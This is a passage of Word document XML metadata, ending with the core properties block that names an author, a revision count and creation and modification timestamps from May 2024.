w15:val="{5E2FA524-EF10-402B-9974-CD311B584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03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3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037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03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037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03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03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03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03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037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37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037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0379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0379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0379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0379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0379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0379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03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03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03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03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03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0379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0379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0379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037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0379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037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Covi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michele Covi</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-21T08:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-21T11:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>